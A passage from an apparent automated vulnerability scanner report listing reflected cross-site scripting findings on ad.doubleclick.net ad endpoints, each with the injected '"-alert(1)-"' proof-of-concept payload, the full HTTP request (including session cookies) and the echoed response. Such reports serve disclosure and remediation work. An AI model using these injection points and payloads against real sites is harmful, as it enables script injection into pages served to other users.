Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:33:39 GMT
Expires: Tue, 28 Jun 2011 02:33:39 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=926de"-alert(1)-"6a870769378http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner%26utm_campaign%3D5383603%26utm_content%3DZ10KP");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ef0"-alert(1)-"7fe67c3c10a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477c3ef0"-alert(1)-"7fe67c3c10a&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Date: Tue, 28 Jun 2011 02:32:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
"http://s0.2mdn.net/3094545/Chase_Sapphire_10k No Fee_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477c3ef0"-alert(1)-"7fe67c3c10a&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 683c0"-alert(1)-"53404fc0cf5 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488683c0"-alert(1)-"53404fc0cf5&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:53 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488683c0"-alert(1)-"53404fc0cf5&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8295b"-alert(1)-"0063854f767 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=1125138295b"-alert(1)-"0063854f767&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:27 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=1125138295b"-alert(1)-"0063854f767&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e933c"-alert(1)-"2d7f11bea7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530e933c"-alert(1)-"2d7f11bea7&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6035
Date: Tue, 28 Jun 2011 02:28:19 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530e933c"-alert(1)-"2d7f11bea7&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var op
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189ae"-alert(1)-"2f1dc89c1e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&189ae"-alert(1)-"2f1dc89c1e3=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6051
Date: Tue, 28 Jun 2011 02:29:04 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
2%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&189ae"-alert(1)-"2f1dc89c1e3=1http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c64cb"-alert(1)-"4e5a87e0f7b was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=c64cb"-alert(1)-"4e5a87e0f7b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:28:41 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
42%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=440354583601742042&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=c64cb"-alert(1)-"4e5a87e0f7bhttp://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.11 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d18"-alert(1)-"a23769c2b50 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.11;sz=300x250;ord=440354583601742042;click=http://pixel.mathtag.com/click/img?mt_aid=44035458360174204242d18"-alert(1)-"a23769c2b50&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABULokAAAAAAIfeIgAAAAAAAgD4AAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAC3tS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAAQbIWsPwAAAAAAAAAAAAAAEGyFrD8AAAAAAAAAAAAAABBshaw.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA6j5JWSBSCt28fbtUajyGfWNtb.w0WAsyvKaZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D368416841%26r%3D0%26s%3D1887835,0a7ae188-a12e-11e0-9c74-dbaa6e36b2c4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6039
Date: Tue, 28 Jun 2011 02:27:05 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/o%3B239209705%3B0-0%3B0%3B62127642%3B4307-300/250%3B41296617/41314404/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=44035458360174204242d18"-alert(1)-"a23769c2b50&mt_id=112513&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go111.htm?soa=59797");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519f1"-alert(1)-"cc5a0c33515 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488519f1"-alert(1)-"cc5a0c33515&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
